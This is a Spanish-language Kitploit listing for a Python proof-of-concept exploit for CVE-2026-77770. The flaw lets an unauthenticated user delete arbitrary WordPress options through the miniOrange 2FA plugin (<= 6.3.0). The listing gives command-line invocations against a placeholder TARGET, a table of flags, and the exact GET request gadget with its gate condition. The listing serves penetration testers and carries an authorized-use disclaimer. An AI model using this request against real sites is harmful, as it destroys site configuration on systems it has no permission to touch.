Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-77770 — PoC en Python para CVE-2026-77770, una vulnerabilidad de eliminación arbitraria de opciones de WordPress sin autenticación en el plugin miniOrange 2FA (<= 6.3.0) a través del enlace de verificación por correo electrónico. | Kitploit
Herramientas/GitHubGitHub/cflowsec/cve-2026-77770
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubcflowsec/cve-2026-77770

CVE-2026-77770

PoC en Python para CVE-2026-77770, una vulnerabilidad de eliminación arbitraria de opciones de WordPress sin autenticación en el plugin miniOrange 2FA (<= 6.3.0) a través del enlace de verificación por correo electrónico.

Ver Repositorio
hace 16h 26mAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-77770

miniOrange 2FA CVE POC

miniOrange 2FA (plugin de WordPress miniorange-2-factor-authentication) ≤ 6.3.0 — eliminación arbitraria de opciones de WordPress sin autenticación a través del enlace de verificación por correo electrónico (userID / Txid / accessToken).

Solo para pruebas autorizadas. No ejecutes esto contra sistemas que no sean de tu propiedad o que no tengas permiso para probar.

Requiere: Python 3, solo biblioteca estándar.

root@kitploit:~
python3 cve-2026-77770-miniorange-2fa-option-delete.py -u http://TARGET --test
python3 cve-2026-77770-miniorange-2fa-option-delete.py -u http://TARGET --test --delete blogname
python3 cve-2026-77770-miniorange-2fa-option-delete.py -u https://TARGET --delete blogname --insecure
python3 cve-2026-77770-miniorange-2fa-option-delete.py -u TARGET --delete blogname
FlagQué hace
-u / --urlRaíz del sitio WordPress (obligatorio). http:// o https://; un nombre de host se prueba primero como HTTPS y luego como HTTP. El TLS autofirmado se reintenta automáticamente
--testInvitado: versión del plugin + ventana emergente de verificación por correo electrónico
--delete OPTIONElimina esa fila de wp_options. blogname es visible a través de /wp-json/ (BEFORE / AFTER)
--gate OPTIONOpción cuyo valor almacenado es 3 (la puerta Txid). Repetible. Predeterminado: wp_page_for_privacy_policy, luego thread_comments_depth
--insecureOmite la verificación TLS
--timeoutSegundos de tiempo de espera HTTP (predeterminado 30)

Sin autenticación. El gadget es un GET a /?userID=OPTION&Txid=GATE&accessToken=x. GATE debe contener actualmente el entero 3. Si se pierde la ventana de 5 minutos, el plugin también escribe GATE=0.

--test no elimina. --delete blogname es la prueba pública (el título del sitio en /wp-json/ queda vacío). 6.3.1 prefija las claves (mo2f_oobe_*), por lo que los nombres sin prefijo no se eliminan.

Stdout: VERSION, HANDLER, PRESENT, SITENAME, OPTION, BEFORE, AFTER, GATE, VULNERABLE, NOT_VULNERABLE, NOT_FOUND, ATTEMPTED.

Working PoC

CVE: CVE-2026-77770. Registro de cambios del plugin 6.3.1.

Descargar herramienta